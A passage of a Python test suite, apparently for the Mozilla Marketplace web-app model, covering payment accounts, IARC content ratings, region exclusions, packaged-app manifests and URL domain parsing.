        self.create_switch('iarc')
        for step in (detail_step, rating_step, pay_step):
            step.return_value = False
        app = app_factory(status=amo.STATUS_NULL)
        self.make_premium(app)
        eq_(app.next_step()['url'], app.get_dev_url())
        detail_step.return_value = True
        eq_(app.next_step()['url'], app.get_dev_url('ratings'))
        rating_step.return_value = True
        eq_(app.next_step()['url'], app.get_dev_url('payments'))
        pay_step.return_value = True
        assert not app.next_step()
    def test_meta_translated_fields(self):
        """Test that we don't load translations for all the translated fields
        that live on Addon but we don't need in Webapp."""
        useless_fields = ('eula', 'thankyou_note', 'summary',
                          'developer_comments', 'the_future', 'the_reason')
        useful_fields = ('homepage', 'privacy_policy', 'name', 'description',
                         'support_email', 'support_url')
        self.assertSetEqual(Addon._meta.translated_fields,
            [Addon._meta.get_field(f) for f in useless_fields + useful_fields])
        self.assertSetEqual(Webapp._meta.translated_fields,
            [Webapp._meta.get_field(f) for f in useful_fields])
        # Build fake data with all fields, and use it to create an app.
        data = dict(zip(useless_fields + useful_fields,
                        useless_fields + useful_fields))
        app = app_factory(**data)
        for field_name in useless_fields + useful_fields:
            field_id_name = app._meta.get_field(field_name).attname
            ok_(getattr(app, field_name, None))
            ok_(getattr(app, field_id_name, None))
        # Reload the app, the useless fields should all have ids but the value
        # shouldn't have been loaded.
        app = Webapp.objects.get(pk=app.pk)
        for field_name in useless_fields:
            field_id_name = app._meta.get_field(field_name).attname
            ok_(getattr(app, field_name, None) is None)
            ok_(getattr(app, field_id_name, None))
        # The useful fields should all be ok.
        for field_name in useful_fields:
            field_id_name = app._meta.get_field(field_name).attname
            ok_(getattr(app, field_name, None))
            ok_(getattr(app, field_id_name, None))
    def test_has_payment_account(self):
        app = app_factory()
        assert not app.has_payment_account()
        self.add_payment_account(app, PROVIDER_BANGO)
        assert app.has_payment_account()
    def test_has_multiple_payment_accounts(self):
        app = app_factory()
        assert not app.has_multiple_payment_accounts(), 'no accounts'
        account = self.add_payment_account(app, PROVIDER_BANGO)
        assert not app.has_multiple_payment_accounts(), 'one account'
        self.add_payment_account(app, PROVIDER_BOKU, user=account.user)
        ok_(app.has_multiple_payment_accounts(), 'two accounts')
    def test_no_payment_account(self):
        # Asking for a provider account that doesn't exist raises.
        app = app_factory()
        assert not app.has_payment_account()
        with self.assertRaises(app.PayAccountDoesNotExist):
            app.payment_account(PROVIDER_BANGO)
    def test_get_payment_account(self):
        app = app_factory()
        acct = self.add_payment_account(app, PROVIDER_BANGO)
        fetched_acct = app.payment_account(PROVIDER_BANGO)
        eq_(acct, fetched_acct)
    @mock.patch('mkt.webapps.models.Webapp.has_payment_account')
    def test_payments_complete(self, pay_mock):
        # Default to complete if it's not needed.
        pay_mock.return_value = False
        app = app_factory()
        assert app.payments_complete()
        self.make_premium(app)
        assert not app.payments_complete()
        pay_mock.return_value = True
        assert app.payments_complete()
    def test_version_and_file_transformer_with_empty_query(self):
        # When we process a query, don't return a list just because
        # the query is empty
        empty_query = Webapp.objects.filter(app_slug='mahna__mahna')
        empty_result = Webapp.version_and_file_transformer(empty_query)
        self.assertEqual(empty_result.count(), 0)
class TestWebappContentRatings(amo.tests.TestCase):
    """IARC content-rating plumbing: setting ratings/descriptors/
    interactive elements and pushing them to the IARC storefront."""
    def test_rated(self):
        self.create_switch('iarc')
        assert app_factory(rated=True).is_rated()
        assert not app_factory().is_rated()
    @mock.patch('mkt.webapps.models.Webapp.details_complete')
    @mock.patch('mkt.webapps.models.Webapp.payments_complete')
    def test_set_content_ratings(self, pay_mock, detail_mock):
        # Setting ratings on a complete app moves it to pending.
        self.create_switch('iarc')
        detail_mock.return_value = True
        pay_mock.return_value = True
        rb = mkt.ratingsbodies
        app = app_factory(status=amo.STATUS_NULL)
        app.set_content_ratings({})
        assert not app.is_rated()
        eq_(app.status, amo.STATUS_NULL)
        # Create.
        app.set_content_ratings({
            rb.CLASSIND: rb.CLASSIND_L,
            rb.PEGI: rb.PEGI_3,
        })
        eq_(ContentRating.objects.count(), 2)
        for expected in [(rb.CLASSIND.id, rb.CLASSIND_L.id),
                         (rb.PEGI.id, rb.PEGI_3.id)]:
            assert ContentRating.objects.filter(
                addon=app, ratings_body=expected[0],
                rating=expected[1]).exists()
        eq_(app.reload().status, amo.STATUS_PENDING)
        # Update.
        app.set_content_ratings({
            rb.CLASSIND: rb.CLASSIND_10,
            rb.PEGI: rb.PEGI_3,
            rb.GENERIC: rb.GENERIC_18,
        })
        for expected in [(rb.CLASSIND.id, rb.CLASSIND_10.id),
                         (rb.PEGI.id, rb.PEGI_3.id),
                         (rb.GENERIC.id, rb.GENERIC_18.id)]:
            assert ContentRating.objects.filter(
                addon=app, ratings_body=expected[0],
                rating=expected[1]).exists()
        eq_(app.reload().status, amo.STATUS_PENDING)
    def test_app_delete_clears_iarc_data(self):
        self.create_switch('iarc')
        app = app_factory(rated=True)
        # Ensure we have some data to start with.
        ok_(IARCInfo.objects.filter(addon=app).exists())
        ok_(ContentRating.objects.filter(addon=app).exists())
        ok_(RatingDescriptors.objects.filter(addon=app).exists())
        ok_(RatingInteractives.objects.filter(addon=app).exists())
        # Delete.
        app.delete()
        msg = 'Related IARC data should be deleted.'
        ok_(not IARCInfo.objects.filter(addon=app).exists(), msg)
        ok_(not ContentRating.objects.filter(addon=app).exists(), msg)
        ok_(not RatingDescriptors.objects.filter(addon=app).exists(), msg)
        ok_(not RatingInteractives.objects.filter(addon=app).exists(), msg)
    def test_set_content_ratings_usk_refused(self):
        # A USK rejection toggles the DE exclusion flag both ways.
        app = app_factory()
        app.set_content_ratings({
            mkt.ratingsbodies.USK: mkt.ratingsbodies.USK_REJECTED
        })
        ok_(Geodata.objects.get(addon=app).region_de_usk_exclude)
        app.set_content_ratings({
            mkt.ratingsbodies.USK: mkt.ratingsbodies.USK_12
        })
        ok_(not Geodata.objects.get(addon=app).region_de_usk_exclude)
    def test_set_content_ratings_iarc_games_unexclude(self):
        # Receiving any rating clears the IARC-based region exclusions.
        app = app_factory()
        app._geodata.update(region_br_iarc_exclude=True,
                            region_de_iarc_exclude=True)
        app.set_content_ratings({
            mkt.ratingsbodies.USK: mkt.ratingsbodies.USK_12
        })
        geodata = Geodata.objects.get(addon=app)
        ok_(not geodata.region_br_iarc_exclude)
        ok_(not geodata.region_de_iarc_exclude)
    def test_set_content_ratings_purge_unexclude(self):
        # Re-rating a purged, disabled app restores it to public.
        app = app_factory()
        app.update(status=amo.STATUS_DISABLED, iarc_purged=True)
        app.set_content_ratings({
            mkt.ratingsbodies.USK: mkt.ratingsbodies.USK_12
        })
        ok_(not app.reload().iarc_purged)
        eq_(app.status, amo.STATUS_PUBLIC)
    def test_set_descriptors(self):
        app = app_factory()
        eq_(RatingDescriptors.objects.count(), 0)
        app.set_descriptors([])
        descriptors = RatingDescriptors.objects.get(addon=app)
        assert not descriptors.has_classind_drugs
        assert not descriptors.has_esrb_blood # Blood-deuh!
        # Create.
        app.set_descriptors([
            'has_classind_drugs', 'has_pegi_scary', 'has_generic_drugs'
        ])
        descriptors = RatingDescriptors.objects.get(addon=app)
        assert descriptors.has_classind_drugs
        assert descriptors.has_pegi_scary
        assert descriptors.has_generic_drugs
        assert not descriptors.has_esrb_blood
        # Update.
        app.set_descriptors([
            'has_esrb_blood', 'has_classind_drugs'
        ])
        descriptors = RatingDescriptors.objects.get(addon=app)
        assert descriptors.has_esrb_blood
        assert descriptors.has_classind_drugs
        assert not descriptors.has_pegi_scary
        assert not descriptors.has_generic_drugs
    def test_set_interactives(self):
        # Unknown/badly-cased flags are tolerated; flags not passed on an
        # update are reset.
        app = app_factory()
        app.set_interactives([])
        eq_(RatingInteractives.objects.count(), 1)
        app_interactives = RatingInteractives.objects.get(addon=app)
        assert not app_interactives.has_shares_info
        assert not app_interactives.has_digital_purchases
        # Create.
        app.set_interactives([
            'has_shares_info', 'has_digital_PurChaSes', 'has_UWOTM8'
        ])
        eq_(RatingInteractives.objects.count(), 1)
        app_interactives = RatingInteractives.objects.get(addon=app)
        assert app_interactives.has_shares_info
        assert app_interactives.has_digital_purchases
        assert not app_interactives.has_users_interact
        # Update.
        app.set_interactives([
            'has_digital_purchases', 'has_shares_ur_mum'
        ])
        eq_(RatingInteractives.objects.count(), 1)
        app_interactives = RatingInteractives.objects.get(addon=app)
        assert not app_interactives.has_shares_info
        assert app_interactives.has_digital_purchases
    @mock.patch('lib.iarc.client.MockClient.call')
    @mock.patch('mkt.webapps.models.render_xml')
    def test_set_iarc_storefront_data(self, render_mock, storefront_mock):
        # Set up ratings/descriptors/interactives.
        self.create_switch('iarc')
        app = app_factory(name='LOL', app_slug='ha')
        app.current_version.reviewed = datetime(2013, 1, 1, 12, 34, 56)
        app.current_version._developer_name = 'Lex Luthor'
        app.set_iarc_info(submission_id=1234, security_code='sektor')
        app.set_descriptors(['has_esrb_blood', 'has_pegi_scary'])
        app.set_interactives(['has_users_interact', 'has_shares_info'])
        app.content_ratings.create(
            ratings_body=mkt.ratingsbodies.ESRB.id,
            rating=mkt.ratingsbodies.ESRB_A.id)
        app.content_ratings.create(
            ratings_body=mkt.ratingsbodies.PEGI.id,
            rating=mkt.ratingsbodies.PEGI_3.id)
        # Check the client was called.
        app.set_iarc_storefront_data()
        assert storefront_mock.called
        eq_(render_mock.call_count, 2)
        eq_(render_mock.call_args_list[0][0][0], 'set_storefront_data.xml')
        # Check arguments to the XML template are all correct.
        data = render_mock.call_args_list[0][0][1]
        eq_(type(data['title']), unicode)
        eq_(data['app_url'], app.get_url_path())
        eq_(data['submission_id'], 1234)
        eq_(data['security_code'], 'sektor')
        eq_(data['rating_system'], 'ESRB')
        eq_(data['release_date'], app.current_version.reviewed)
        eq_(data['title'], 'LOL')
        eq_(data['company'], 'Lex Luthor')
        eq_(data['rating'], 'Adults Only')
        eq_(data['descriptors'], 'Blood')
        self.assertSetEqual(data['interactive_elements'].split(', '),
                            ['Shares Info', 'Users Interact'])
        data = render_mock.call_args_list[1][0][1]
        eq_(type(data['title']), unicode)
        eq_(data['submission_id'], 1234)
        eq_(data['security_code'], 'sektor')
        eq_(data['rating_system'], 'PEGI')
        eq_(data['release_date'], app.current_version.reviewed)
        eq_(data['title'], 'LOL')
        eq_(data['company'], 'Lex Luthor')
        eq_(data['rating'], '3+')
        eq_(data['descriptors'], 'Fear')
        self.assertSetEqual(data['interactive_elements'].split(', '),
                            ['Shares Info', 'Users Interact'])
    @mock.patch('lib.iarc.client.MockClient.call')
    def test_set_iarc_storefront_data_not_rated_by_iarc(self, storefront_mock):
        self.create_switch('iarc')
        app_factory().set_iarc_storefront_data()
        assert not storefront_mock.called
    @mock.patch('mkt.webapps.models.Webapp.current_version', new=None)
    @mock.patch('lib.iarc.client.MockClient.call')
    def test_set_iarc_storefront_data_no_version(self, storefront_mock):
        # A missing current version must not stop the storefront push.
        self.create_switch('iarc')
        app = app_factory(rated=True, status=amo.STATUS_PUBLIC)
        ok_(not app.current_version)
        app.set_iarc_storefront_data()
        assert storefront_mock.called
    @mock.patch('lib.iarc.client.MockClient.call')
    def test_set_iarc_storefront_data_invalid_status(self, storefront_mock):
        self.create_switch('iarc')
        app = app_factory()
        for status in (amo.STATUS_NULL, amo.STATUS_PENDING):
            app.update(status=status)
            app.set_iarc_storefront_data()
            assert not storefront_mock.called
    @mock.patch('mkt.webapps.models.render_xml')
    @mock.patch('lib.iarc.client.MockClient.call')
    def test_set_iarc_storefront_data_disable(self, storefront_mock,
                                              render_mock):
        self.create_switch('iarc')
        app = app_factory(name='LOL', rated=True)
        app.current_version.update(_developer_name='Lex Luthor')
        app.set_iarc_info(123, 'abc')
        app.set_iarc_storefront_data(disable=True)
        data = render_mock.call_args_list[0][0][1]
        eq_(data['submission_id'], 123)
        eq_(data['security_code'], 'abc')
        eq_(data['title'], 'LOL')
        eq_(data['release_date'], '')
        # Also test that a deleted app has the correct release_date.
        app.delete()
        app.set_iarc_storefront_data()
        data = render_mock.call_args_list[0][0][1]
        eq_(data['submission_id'], 123)
        eq_(data['security_code'], 'abc')
        eq_(data['title'], 'LOL')
        eq_(data['release_date'], '')
    def test_get_descriptors_slugs(self):
        app = app_factory()
        eq_(app.get_descriptors_slugs(), [])
        app.set_descriptors(['has_esrb_blood', 'has_pegi_scary'])
        self.assertSetEqual(
            app.get_descriptors_slugs(), ['ESRB_BLOOD', 'PEGI_SCARY'])
    def test_get_descriptors_dehydrated(self):
        app = app_factory()
        eq_(app.get_descriptors_dehydrated(), {})
        app.set_descriptors(['has_esrb_blood', 'has_pegi_scary'])
        eq_(dict(app.get_descriptors_dehydrated()),
            {'esrb': ['blood'], 'pegi': ['scary']})
    def test_get_interactives_slugs(self):
        app = app_factory()
        eq_(app.get_interactives_slugs(), [])
        app.set_interactives(['has_digital_purchases', 'has_shares_info'])
        self.assertSetEqual(app.get_interactives_slugs(),
                            ['DIGITAL_PURCHASES', 'SHARES_INFO'])
    def test_get_interactives_dehydrated(self):
        app = app_factory()
        eq_(app.get_interactives_dehydrated(), [])
        app.set_interactives(['has_digital_purchases', 'has_shares_info'])
        eq_(app.get_interactives_dehydrated(), ['shares-info',
                                                'digital-purchases'])
    @override_settings(SECRET_KEY='test')
    def test_iarc_token(self):
        # Token is sha512(SECRET_KEY + app id).
        app = Webapp()
        app.id = 1
        eq_(app.iarc_token(),
            hashlib.sha512(settings.SECRET_KEY + str(app.id)).hexdigest())
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    def test_delete_with_iarc(self, storefront_mock):
        self.create_switch('iarc')
        app = app_factory(rated=True)
        app.delete()
        eq_(app.status, amo.STATUS_DELETED)
        assert storefront_mock.called
    @mock.patch('mkt.webapps.models.Webapp.is_rated')
    def test_content_ratings_complete(self, is_rated_mock):
        # Default to complete if it's not needed.
        is_rated_mock.return_value = False
        app = app_factory()
        assert app.content_ratings_complete()
        self.create_switch('iarc', db=True)
        assert not app.content_ratings_complete()
        is_rated_mock.return_value = True
        assert app.content_ratings_complete()
    @mock.patch('mkt.webapps.models.Webapp.details_complete')
    @mock.patch('mkt.webapps.models.Webapp.payments_complete')
    def test_completion_errors_ignore_ratings(self, mock1, mock2):
        self.create_switch('iarc')
        app = app_factory()
        # NOTE(review): this loop variable shadows the `mock` module name;
        # harmless in this scope, but worth renaming (e.g. to `mocked`).
        for mock in (mock1, mock2):
            mock.return_value = True
        assert app.completion_errors()
        assert not app.is_fully_complete()
        assert 'content_ratings' not in (
            app.completion_errors(ignore_ratings=True))
        assert app.is_fully_complete(ignore_ratings=True)
class DeletedAppTests(amo.tests.TestCase):
    """Soft-deleting an app whose cached version FKs are empty must not
    blow up; the version properties simply stay None."""
    def test_soft_deleted_no_current_version(self):
        app = amo.tests.app_factory()
        app._current_version = None
        app.save()
        app.delete()
        eq_(app.current_version, None)
    def test_soft_deleted_no_latest_version(self):
        app = amo.tests.app_factory()
        app._latest_version = None
        app.save()
        app.delete()
        eq_(app.latest_version, None)
class TestExclusions(amo.tests.TestCase):
    """Region-exclusion calculation for a premium app."""
    fixtures = fixture('prices')
    def setUp(self):
        # Premium app explicitly excluded from the US.
        self.app = Webapp.objects.create(premium_type=amo.ADDON_PREMIUM)
        self.app.addonexcludedregion.create(region=mkt.regions.US.id)
        self.geodata = self.app._geodata
    def make_tier(self):
        # Attach price tier pk=1 from the fixture to the app.
        self.price = Price.objects.get(pk=1)
        AddonPremium.objects.create(addon=self.app, price=self.price)
    def test_not_premium(self):
        ok_(mkt.regions.US.id in self.app.get_excluded_region_ids())
    def test_premium(self):
        self.make_tier()
        ok_(mkt.regions.US.id in self.app.get_excluded_region_ids())
    def test_premium_remove_tier(self):
        # Regions whose price currency is marked unpaid get excluded too.
        self.make_tier()
        (self.price.pricecurrency_set
         .filter(region=mkt.regions.PL.id).update(paid=False))
        ok_(mkt.regions.PL.id in self.app.get_excluded_region_ids())
    def test_usk_rating_refused(self):
        self.geodata.update(region_de_usk_exclude=True)
        ok_(mkt.regions.DE.id in self.app.get_excluded_region_ids())
    def test_game_iarc(self):
        # IARC exclusion flags apply to BR and DE.
        self.geodata.update(region_de_iarc_exclude=True,
                            region_br_iarc_exclude=True)
        excluded = self.app.get_excluded_region_ids()
        ok_(mkt.regions.BR.id in excluded)
        ok_(mkt.regions.DE.id in excluded)
class TestPackagedAppManifestUpdates(amo.tests.TestCase):
    # Note: More extensive tests for `Addon.update_names` are in the Addon
    # model tests.
    fixtures = ['base/platforms']
    def setUp(self):
        self.webapp = amo.tests.app_factory(is_packaged=True,
                                            default_locale='en-US')
        self.webapp.name = {'en-US': 'Packaged App'}
        self.webapp.save()
    @mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
    def test_package_manifest_default_name_change(self, get_manifest_json):
        # The app name follows the (mocked) package manifest's name.
        get_manifest_json.return_value = {'name': 'Yo'}
        self.trans_eq(self.webapp.name, 'en-US', 'Packaged App')
        self.webapp.update_name_from_package_manifest()
        self.webapp = Webapp.objects.get(pk=self.webapp.pk)
        self.trans_eq(self.webapp.name, 'en-US', 'Yo')
    @mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
    def test_package_manifest_default_locale_change(self, get_manifest_json):
        # Changing default_locale moves the name under the new locale.
        get_manifest_json.return_value = {'name': 'Yo', 'default_locale': 'fr'}
        eq_(self.webapp.default_locale, 'en-US')
        self.webapp.update_name_from_package_manifest()
        eq_(self.webapp.default_locale, 'fr')
        self.trans_eq(self.webapp.name, 'en-US', None)
        self.trans_eq(self.webapp.name, 'fr', 'Yo')
    @mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
    def test_package_manifest_locales_change(self, get_manifest_json):
        # supported_locales is rebuilt (sorted) from the manifest locales.
        get_manifest_json.return_value = {'name': 'Yo',
                                          'locales': {'es': {'name': 'es'},
                                                      'de': {'name': 'de'}}}
        self.webapp.update_supported_locales()
        eq_(self.webapp.current_version.supported_locales, 'de,es')
    def test_update_name_from_package_manifest_version(self):
        # The name must come from the current (reviewed) version's
        # manifest, not from a disabled latest version.
        evil_manifest = {
            'name': u'Evil App Name'
        }
        good_manifest = {
            'name': u'Good App Name',
        }
        latest_version = version_factory(addon=self.webapp, version='2.3',
            file_kw=dict(status=amo.STATUS_DISABLED))
        current_version = self.webapp.current_version
        AppManifest.objects.create(version=current_version,
                                   manifest=json.dumps(good_manifest))
        AppManifest.objects.create(version=latest_version,
                                   manifest=json.dumps(evil_manifest))
        self.webapp.update_name_from_package_manifest()
        eq_(self.webapp.name, u'Good App Name')
class TestWebappVersion(amo.tests.TestCase):
    """get_latest_file() behaviour across version/file combinations."""
    fixtures = ['base/platforms']
    def test_no_version(self):
        # No current version at all -> no latest file.
        eq_(Webapp().get_latest_file(), None)
    def test_no_file(self):
        # A current version with no files -> no latest file.
        app = Webapp.objects.create(manifest_url='http://foo.com')
        app._current_version = Version.objects.create(addon=app)
        eq_(app.get_latest_file(), None)
    def test_right_file(self):
        # With several files on the version, the most recently created
        # one is returned.
        app = Webapp.objects.create(manifest_url='http://foo.com')
        version = Version.objects.create(addon=app)
        older = File.objects.create(version=version, platform_id=1)
        older.update(created=datetime.now() - timedelta(days=1))
        newer = File.objects.create(version=version, platform_id=1)
        app._current_version = version
        eq_(app.get_latest_file().pk, newer.pk)
class TestWebappManager(amo.tests.TestCase):
    """Tests for the custom Webapp manager querysets (reviewed/visible/
    rated/by_identifier).

    The original setUp assigned lambdas with a mutable default argument
    (`f=[]`) to instance attributes; these are now plain helper methods
    (PEP 8 E731), called exactly as before.
    """
    def reviewed_eq(self, expected=()):
        # Assert Webapp.objects.reviewed() returns exactly `expected`.
        eq_(list(Webapp.objects.reviewed()), list(expected))
    def listed_eq(self, expected=()):
        # Assert Webapp.objects.visible() returns exactly `expected`.
        eq_(list(Webapp.objects.visible()), list(expected))
    def test_reviewed(self):
        for status in amo.REVIEWED_STATUSES:
            w = Webapp.objects.create(status=status)
            self.reviewed_eq([w])
            Webapp.objects.all().delete()
    def test_unreviewed(self):
        for status in amo.UNREVIEWED_STATUSES:
            Webapp.objects.create(status=status)
            self.reviewed_eq()
            Webapp.objects.all().delete()
    def test_listed(self):
        # Public status, non-null current version, non-user-disabled.
        w = app_factory(status=amo.STATUS_PUBLIC)
        self.listed_eq([w])
    def test_unlisted(self):
        # Public, null current version, non-user-disabled.
        w = Webapp.objects.create()
        self.listed_eq()
        # With current version but unreviewed.
        Version.objects.create(addon=w)
        self.listed_eq()
        # And user-disabled.
        w.update(disabled_by_user=True)
        self.listed_eq()
    def test_by_identifier(self):
        # Lookup works by numeric id, stringified id, or slug.
        w = Webapp.objects.create(app_slug='foo')
        eq_(Webapp.objects.by_identifier(w.id), w)
        eq_(Webapp.objects.by_identifier(str(w.id)), w)
        eq_(Webapp.objects.by_identifier(w.app_slug), w)
        with self.assertRaises(Webapp.DoesNotExist):
            Webapp.objects.by_identifier('fake')
    def test_rated(self):
        self.create_switch('iarc')
        rated = app_factory(rated=True)
        app_factory()
        eq_(Webapp.objects.count(), 2)
        eq_(list(Webapp.objects.rated()), [rated])
class TestManifest(BaseWebAppTest):
    """A freshly submitted hosted app must expose the manifest JSON it
    was submitted with."""
    def test_get_manifest_json(self):
        app = self.post_addon()
        assert app.current_version
        assert app.current_version.has_files
        with open(self.manifest, 'r') as fh:
            expected = json.load(fh)
        eq_(app.get_manifest_json(), expected)
class PackagedFilesMixin(amo.tests.AMOPaths):
    """Mixin that copies a fixture .zip into place for `self.file`."""
    def setUp(self):
        self.package = self.packaged_app_path('mozball.zip')
    def setup_files(self, filename='mozball.zip'):
        # This assumes self.file exists.
        if not storage.exists(self.file.file_path):
            try:
                # We don't care if these dirs exist.
                os.makedirs(os.path.dirname(self.file.file_path))
            except OSError:
                pass
            shutil.copyfile(self.packaged_app_path(filename),
                            self.file.file_path)
class TestPackagedModel(amo.tests.TestCase):
    @mock.patch.object(settings, 'SITE_URL', 'http://hy.fr')
    @mock.patch('lib.crypto.packaged.os.unlink', new=mock.Mock)
    def test_create_blocklisted_version(self):
        # Blocklisting a packaged app appends a 'blocklisted' version and
        # serves a replacement "Blocked by Mozilla" manifest.
        app = app_factory(name=u'Mozillaball ょ', app_slug='test',
                          is_packaged=True, version_kw={'version': '1.0',
                                                        'created': None})
        app.create_blocklisted_version()
        app = app.reload()
        v = app.versions.latest()
        f = v.files.latest()
        eq_(app.status, amo.STATUS_BLOCKED)
        eq_(app.versions.count(), 2)
        eq_(v.version, 'blocklisted')
        eq_(app._current_version, v)
        assert 'blocklisted' in f.filename
        eq_(f.status, amo.STATUS_BLOCKED)
        # Check manifest.
        url = app.get_manifest_url()
        res = self.client.get(url)
        eq_(res['Content-type'],
            'application/x-web-app-manifest+json; charset=utf-8')
        assert 'etag' in res._headers
        data = json.loads(res.content)
        eq_(data['name'], 'Blocked by Mozilla')
        eq_(data['version'], 'blocklisted')
        eq_(data['package_path'], 'http://hy.fr/downloads/file/%s/%s' % (
            f.id, f.filename))
class TestPackagedManifest(BasePackagedAppTest):
    """Tests for manifest extraction and mini-manifest generation for
    packaged apps."""
    def _get_manifest_json(self):
        """Read and parse manifest.webapp straight out of the zip at
        self.package (set up by the base class)."""
        zf = zipfile.ZipFile(self.package)
        data = zf.open('manifest.webapp').read()
        zf.close()
        return json.loads(data)
    def test_get_manifest_json(self):
        """get_manifest_json() matches the manifest inside the package."""
        webapp = self.post_addon()
        eq_(webapp.status, amo.STATUS_NULL)
        assert webapp.current_version
        assert webapp.current_version.has_files
        mf = self._get_manifest_json()
        eq_(webapp.get_manifest_json(), mf)
    def test_get_manifest_json_w_file(self):
        """get_manifest_json(file) accepts an explicit File argument."""
        webapp = self.post_addon()
        eq_(webapp.status, amo.STATUS_NULL)
        assert webapp.current_version
        assert webapp.current_version.has_files
        file_ = webapp.current_version.all_files[0]
        mf = self._get_manifest_json()
        eq_(webapp.get_manifest_json(file_), mf)
    def test_get_manifest_json_multiple_versions(self):
        """With an older backfilled version present, the manifest comes
        from the latest (current) version."""
        # Post the real app/version, but backfill an older version.
        webapp = self.post_addon()
        latest_version = webapp.latest_version
        webapp.current_version.files.update(status=amo.STATUS_PUBLIC)
        version = version_factory(addon=webapp, version='0.5',
                                  created=self.days_ago(1))
        version.files.update(created=self.days_ago(1))
        webapp = Webapp.objects.get(pk=webapp.pk)
        webapp._current_version = None  # update_version() should find the 1.0.
        webapp.update_version()
        eq_(webapp.current_version, latest_version)
        assert webapp.current_version.has_files
        mf = self._get_manifest_json()
        eq_(webapp.get_manifest_json(), mf)
    def test_get_manifest_json_multiple_version_disabled(self):
        # Post an app, then emulate a reviewer reject and add a new, pending
        # version.
        webapp = self.post_addon()
        webapp.latest_version.files.update(status=amo.STATUS_DISABLED)
        webapp.latest_version.update(created=self.days_ago(1))
        webapp.update(status=amo.STATUS_REJECTED, _current_version=None)
        version = version_factory(addon=webapp, version='2.0',
                                  file_kw=dict(status=amo.STATUS_PENDING))
        mf = self._get_manifest_json()
        AppManifest.objects.create(version=version,
                                   manifest=json.dumps(mf))
        webapp.update_version()
        webapp = webapp.reload()
        eq_(webapp.latest_version, version)
        self.file = version.all_files[0]
        self.setup_files()
        eq_(webapp.get_manifest_json(), mf)
    def test_cached_manifest_is_cached(self):
        """Second call to get_cached_manifest() must hit the cache only."""
        webapp = self.post_addon()
        # First call does queries and caches results.
        webapp.get_cached_manifest()
        # Subsequent calls are cached.
        with self.assertNumQueries(0):
            webapp.get_cached_manifest()
    @mock.patch('mkt.webapps.models.cache')
    def test_cached_manifest_no_version_not_cached(self, cache_mock):
        """Without a current version the mini-manifest is '{}' and is not
        written to the cache."""
        webapp = self.post_addon(
            data={'packaged': True, 'free_platforms': 'free-firefoxos'})
        webapp._current_version = None
        eq_(webapp.get_cached_manifest(force=True), '{}')
        assert not cache_mock.called
    def test_cached_manifest_contents(self):
        """The cached mini-manifest carries name/version/size/release notes
        and a package_path, plus fields copied from the real manifest."""
        webapp = self.post_addon(
            data={'packaged': True, 'free_platforms': 'free-firefoxos'})
        version = webapp.current_version
        self.file = version.all_files[0]
        self.setup_files()
        manifest = self._get_manifest_json()
        data = json.loads(webapp.get_cached_manifest())
        eq_(data['name'], webapp.name)
        eq_(data['version'], webapp.current_version.version)
        eq_(data['size'], self.file.size)
        eq_(data['release_notes'], version.releasenotes)
        eq_(data['package_path'], absolutify(
            os.path.join(reverse('downloads.file', args=[self.file.id]),
                         self.file.filename)))
        eq_(data['developer'], manifest['developer'])
        eq_(data['icons'], manifest['icons'])
        eq_(data['locales'], manifest['locales'])
    @mock.patch.object(packaged, 'sign', mock_sign)
    def test_package_path(self):
        """Downloading via the file's manifest URL serves the zip."""
        webapp = self.post_addon(
            data={'packaged': True, 'free_platforms': 'free-firefoxos'})
        version = webapp.current_version
        file = version.all_files[0]
        res = self.client.get(file.get_url_path('manifest'))
        eq_(res.status_code, 200)
        eq_(res['content-type'], 'application/zip')
    def test_packaged_with_BOM(self):
        """A manifest with a UTF-8 BOM must still parse."""
        # Exercise separate code paths to loading the packaged app manifest.
        self.setup_files('mozBOM.zip')
        assert WebAppParser().parse(self.file.file_path)
        self.assertTrue(self.app.has_icon_in_manifest())
class TestDomainFromURL(unittest.TestCase):
    """Tests for Webapp.domain_from_url(): it strips the path, keeps the
    scheme/host/port, lowercases, and rejects empty input unless
    allow_none is set."""
    def test_simple(self):
        eq_(Webapp.domain_from_url('http://mozilla.com/'),
            'http://mozilla.com')
    def test_long_path(self):
        eq_(Webapp.domain_from_url('http://mozilla.com/super/rad.webapp'),
            'http://mozilla.com')
    def test_no_normalize_www(self):
        # A leading 'www.' is preserved, not stripped.
        eq_(Webapp.domain_from_url('http://www.mozilla.com/super/rad.webapp'),
            'http://www.mozilla.com')
    def test_with_port(self):
        eq_(Webapp.domain_from_url('http://mozilla.com:9000/'),
            'http://mozilla.com:9000')
    def test_subdomains(self):
        eq_(Webapp.domain_from_url('http://apps.mozilla.com/'),
            'http://apps.mozilla.com')
    def test_https(self):
        eq_(Webapp.domain_from_url('https://mozilla.com/'),
            'https://mozilla.com')
    def test_normalize_case(self):
        # Scheme and host are case-normalized to lowercase.
        eq_(Webapp.domain_from_url('httP://mOzIllA.com/'),
            'http://mozilla.com')
    @raises(ValueError)
    def test_none(self):
        Webapp.domain_from_url(None)
    @raises(ValueError)
    def test_empty(self):
        Webapp.domain_from_url('')
    def test_empty_or_none(self):
        eq_(Webapp.domain_from_url(None, allow_none=True), None)
class TestTransformer(amo.tests.TestCase):
    """Tests that Webapp's queryset transformer prefetches related data
    (versions, previews, prices, device types) so no queries run later."""
    fixtures = fixture('webapp_337141')
    def setUp(self):
        self.device = DEVICE_TYPES.keys()[0]
    @mock.patch('mkt.webapps.models.Addon.transformer')
    def test_addon_transformer_not_called(self, transformer):
        """Webapp querysets must use their own transformer, not Addon's."""
        transformer.return_value = {}
        list(Webapp.objects.all())
        assert not transformer.called
    def test_versions(self):
        webapps = list(Webapp.objects.all())
        # Versions were prefetched by the transformer: zero extra queries.
        with self.assertNumQueries(0):
            for webapp in webapps:
                ok_(isinstance(webapp.latest_version, Version))
                ok_(isinstance(webapp.current_version, Version))
    def test_previews(self):
        p1 = Preview.objects.create(filetype='image/png', addon_id=337141,
                                    position=0)
        p2 = Preview.objects.create(filetype='image/png', addon_id=337141,
                                    position=1)
        webapps = list(Webapp.objects.all())
        with self.assertNumQueries(0):
            for webapp in webapps:
                eq_(webapp.all_previews, [p1, p2])
    def test_prices(self):
        self.make_premium(Webapp.objects.get(pk=337141))
        webapps = list(Webapp.objects.all())
        with self.assertNumQueries(0):
            for webapp in webapps:
                ok_(unicode(webapp.premium))
                eq_(str(webapp.get_tier().price), '1.00')
                ok_(webapp.get_tier_name())
    def test_prices_free(self):
        webapps = list(Webapp.objects.all())
        with self.assertNumQueries(0):
            for webapp in webapps:
                eq_(webapp.premium, None)
